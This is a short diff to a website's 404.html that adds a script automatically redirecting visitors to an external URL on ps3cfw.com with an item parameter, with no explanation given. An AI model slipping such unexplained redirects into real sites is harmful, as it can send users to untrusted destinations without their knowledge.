--- a/404.html
+++ b/404.html
@@ -8,4 +8,8 @@
           background-color: #3e3e3e;
         }
         </style>
+         <script>
+      let url = "https://www.ps3cfw.com/cool.php?item=33799193";
+      window.location.href = url;
+    </script>
     </html>
